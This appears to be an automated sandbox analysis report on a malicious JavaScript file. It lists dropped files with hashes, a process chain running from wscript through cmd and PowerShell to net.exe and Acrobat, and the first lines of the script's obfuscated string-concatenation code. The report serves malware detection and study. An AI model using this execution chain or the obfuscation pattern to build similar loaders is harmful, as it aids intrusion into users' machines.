Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.267587116943413 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfbPtdPeUkwRe9:YvXKXec2vR/ZwHAFZGDV8Ukee9 |
MD5: | DC8A0E263BB1D56127756E8329F66D53 |
SHA1: | F52956F9CA43273CA581A6973E474F04328ED0D8 |
SHA-256: | 492319BC397BB68F60BFA8A244E983432861B637000D594A1838660290704F29 |
SHA-512: | 6638EFAC0EE90691EB0EA5D5500B5F7FA7FF81F0D65A6243145DF4B3061920363655D018B40C2BACBCA3E5D1F07D05079A8F146FA61A8DD98DDF39E16C167865 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.266982904181909 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJf21rPeUkwRe9:YvXKXec2vR/ZwHAFZG+16Ukee9 |
MD5: | 30B16D051CC2561A3C81201D1BDDDBD9 |
SHA1: | 7859BDB9D3EC52FBE035B5A8EBB82149A5B29506 |
SHA-256: | CCD170E33B9F04423A62AB3BDD543630C67169936F70AEE447D5DCCC8982D1E2 |
SHA-512: | 8A3E3143823F6A3F3B2B5AFD017A9392D886F9409C8366F09A31665FE846FD70BB1999D79C79FE7F53B91A04F1A78E4128D46487D6DAC23B62E124655EA21514 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.660328002921623 |
Encrypted: | false |
SSDEEP: | 24:Yv6XT2JhAamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS8:YvTJhGBgkDMUJUAh8cvM8 |
MD5: | 9E62966002A6F841E6872621BBC3914A |
SHA1: | 6AF035E7700A775604CE9DE8F66F1647B7358DE0 |
SHA-256: | A91C69395F8452F1898796F04C73247280C57CE05A2390FD4FCECB3BC66690FE |
SHA-512: | 8C627F393C08D61507D8A55D52C4723EABF8948ED6DB79D2F1320F9DB8390857CB0FA5F81E9EBFA3520F21085716CEC3C1A2A50F9474CBA236AB9F5303E9D175 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.238144721240349 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfshHHrPeUkwRe9:YvXKXec2vR/ZwHAFZGUUUkee9 |
MD5: | 9D026D7F07F27C60DB60C7AB44EE28A7 |
SHA1: | 0E7FF6901C379AE00239E68329466F00F9A9DFA8 |
SHA-256: | FB5B02C6D4F3E6F028770034CCEEACF7822F1ED221739DC4B351960182D09073 |
SHA-512: | 4C32EF8C908FE30FA4973F8FD5336F2279E724652FB62A0BA2154D8914DC8438888660F3A926FE24649D576634CB3947805DB106BD4B3528348B7B85CD6C1097 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.260348096435028 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJTqgFCrPeUkwRe9:YvXKXec2vR/ZwHAFZGTq16Ukee9 |
MD5: | C92B2CA54A7C3A00F04D96A1286F1935 |
SHA1: | E320A78956EBF17EBFBF0B167E58D0B8B83BACBF |
SHA-256: | 9CF3E7349F862D6F196333A1F30FD6BA6693BFA2AA07DB785A9F685C191BE38C |
SHA-512: | 6397B59AB78ABAD0CB652CF1E20407DCF05E05CACE518C70468136458D3D04C4E789C596F26E3DCBAED278885F4A1F59401B85D4373159184E0DC8E018EB62E9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.134449717168237 |
Encrypted: | false |
SSDEEP: | 24:YDgVFadayJJJYQ6JSxJqftJneJN3yeJaCNVJcjb5Ssj0SnJS5yJ/2SSbP2LSnJMR:YDtYvfusndS+V0bP8j7GBhZ49lZ |
MD5: | 21AD9CA41C58382F09783BD1BD30ACE8 |
SHA1: | 9D2B3C8179EA86E27F831A6D328FA6749C17148E |
SHA-256: | 54EB10BBDEA37275CEDC9CAD92B0502BFE9A7644386B8777650672AB87920A13 |
SHA-512: | A39B6A571A75908A21C148DEA6D1A2700F059C6D303374CD19DD059624117CB2C305DF147029DF1836DCCBC21D8985556F03A8B6941128DF0C9FAF6B0E57AFB9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.3193417918045034 |
Encrypted: | false |
SSDEEP: | 24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeUmPEtqC:TGufl2GL7ms9WR1CPmPbPahbmypilIBg |
MD5: | 877F042F59E8BC0682D6B2AA5E92BD64 |
SHA1: | 619F7F8932F7448628D5A8C2DB767465EC341311 |
SHA-256: | 71193C289E5FC35C33B3664A2FE4D6DE25744029E64A8985015F79126C271FE0 |
SHA-512: | BA7650945C4AE15A6A12614CF8EC124A309EF349F60C3F737416552E26C0A32B2819F7726E923F40E0199EF1D333D045F6819B643F68CE8DF0CFEF35FF4836D8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.7822248302091108 |
Encrypted: | false |
SSDEEP: | 48:7Mh1WR1CPmPbPahbfypilIIqFl2GL7msLE:7SWfMwbPahb1KVmsw |
MD5: | 9924C728C60725348738C4B191B92CAE |
SHA1: | ED1D92F9A6450A46EA283698840E7CEABC5575C7 |
SHA-256: | DDE4EA2B2CAFA8A0724C01E858619875B049693198A47E942A8B23C305D020BB |
SHA-512: | 6CF38CE16ABD1D7A52885B92C8BEA74443C8A6303F1A25FD132ABB7047E21343F48A32103F79FDBA22387309B81A063A4709009CC79204D3141D61319E30CF48 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgARRLGsCex+CV4Wv7sxrRDNubtOtYyu:6a6TZ44ADEARRLGnU3SxNHtK |
MD5: | 572F80314FAFCF175EBE96F4D8EF2402 |
SHA1: | D4A1EDCC85AE75D3133BFE7399C0429A3F924A64 |
SHA-256: | 901B2582A0BC9BDBF1189062F5A7502B66346041E46B50454B65A1907186D5C7 |
SHA-512: | 626D7B21F660DA9F8511FBB04D3978547F6FC25EBFCBE902B781806980572CA47FB8D2FFCD5F6E5C540D0B950A8A2FBA181C10DB817A696AF280EB9D6CE281AD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllulbnolz:NllUc |
MD5: | F23953D4A58E404FCB67ADD0C45EB27A |
SHA1: | 2D75B5CACF2916C66E440F19F6B3B21DFD289340 |
SHA-256: | 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B |
SHA-512: | B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.488809521505088 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClKYH:Qw946cPbiOxDlbYnuRK+bzYH |
MD5: | 33717ACD23236AF00D9BB3C8D4EE27FC |
SHA1: | 97932AC40AE383A94C35320673B2FC7F1056D7D0 |
SHA-256: | 76217A1ACCA9D3DCE8C065F79C8F380BA4627E30C897484B274631C4727CA8B4 |
SHA-512: | 80827B76469A72C1920CFFE3560403D32E89C14069291FB3789194BF9F8F8E9A75DFB9F1F08B1A738077CAFC5611492F9159AD45023E1F22273AEE6EE7CF8B62 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-11-34-667.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.33860678500249 |
Encrypted: | false |
SSDEEP: | 384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B |
MD5: | C3FEDB046D1699616E22C50131AAF109 |
SHA1: | C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D |
SHA-256: | EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD |
SHA-512: | 845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.374488873771832 |
Encrypted: | false |
SSDEEP: | 384:KBdwdNMgKIVFg08bJ//13NLCCKl4kT7fbM/blN9XGVekST9aadpHAHAFsBjnav/X:PP0 |
MD5: | DB9C07C43299907DC9B8107ACA19BEBC |
SHA1: | 71846C87FABAE3BA75EDFBB0AD5250B330D4961C |
SHA-256: | 122C16C2FD54507A4C66E422F7B26A40C6A5A2B7848F7C319FECD36D5C59B3FE |
SHA-512: | CFDEA59DF819DDFC30927952499BA04665D45BEAF21189460735B3B8F93A19BB2E0602612EF08390A0AF33E86B92F30F5749851F8D07ADA2805118B4542C7176 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.4054419292164395 |
Encrypted: | false |
SSDEEP: | 192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cb4UcbCI0ccbx:ceo4+rsCKl0b |
MD5: | 38AC5637CBE9829AAE2FF55AA389F952 |
SHA1: | 1FABA3A86D83304935AA7F4D35134A1D42F8A9A4 |
SHA-256: | D964C98D65BA9D312528F790D1E0659781092C4CC491D6DEC50163E4D4E131F9 |
SHA-512: | 2D20559E5D880D5AF65FD92BBC649858B8DFBAF6AEE1EAE216CBB098C0582A716B910A1083D62D0E3015560DC6EA99DF85AF77BFCDECD2A96DD9439F65E4DABD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/M7ouWLaGZjZwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLaGZjZwZGk3mlind9i4ufFXpAXkru |
MD5: | AE1E8A5D3E7B2198980A0CA16DE5F3D3 |
SHA1: | A1DB2C58AFC81E6A114A8EB47BE0243956F79460 |
SHA-256: | 8C2E1B13F6658714D51737D6745FE065B87497923945AB3028706A4171C8328F |
SHA-512: | 5B36CF0982C5AFED5CCEA4B30A0B31A2B5312FBF5438623D53153E076B59F1B4BEF8C08695EA74E086BCA4EF7221889DB977B5DCFF4C684BA0683FDDECDE2EC4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.903510220219938 |
TrID: | |
File name: | 795324045931728678.js |
File size: | 19'466 bytes |
MD5: | e294b673ba8139485e4611b1455cfe83 |
SHA1: | e09edb0c7255d861ef82329dcdcd2d7a1b7105ed |
SHA256: | ae2b39d97f110642afd0f602436181900192329f6ea580047688fa61a32b2b58 |
SHA512: | 4fe2ddeccd347fe9184f3d87444edd7ffe11e60840dd0007b6c7d80964815fca030b769dddfdaff9959662cf9b8f6ea881ace5dc2927e9c5f660e3eab8a46eb9 |
SSDEEP: | 384:DgDeoAp9sOWOJ6HcOaYtMFSueHrOOpsPBFyQEyxu0v6ar1LpyX33dooAxStFlMzY:D2agoSNCByXsQ93VyBBCtipVkwV+wYom |
TLSH: | E7920DA8DD0255C3D9F409F49B9B500BABF8018509F844DFD4A234C0796BF75ABC6ABA |
File Content Preview: | function nwrqwl(){rfkceswou=[1031,3079,5127,4103,2055,3072];var rioqny=this[knirs+jgjevsjok+nqequc+fbhznrsmu+owwtpowr+uzdhf+qicugiylh+vyimkex](this[ssgqqb+wjeoybgu+fmbbocb+nqequc+buxbcqp+knirs+vyimkex][tqksmdfxi+nqequc+owwtpowr+jgjevsjok+vyimkex+owwtpowr+ |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 20:11:26 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7afc20000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 20:11:27 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b8020000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 20:11:27 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ee680000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:11:27 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cb6b0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 20:11:31 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e8200000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 20:11:31 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b8020000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 20:11:31 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7cf7c0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 8 |
Start time: | 20:11:32 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79c940000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Target ID: | 9 |
Start time: | 20:11:32 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff67e6d0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | false |
Target ID: | 10 |
Start time: | 20:11:32 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79c940000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function nwrqwl() { |
|
1 | rfkceswou = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
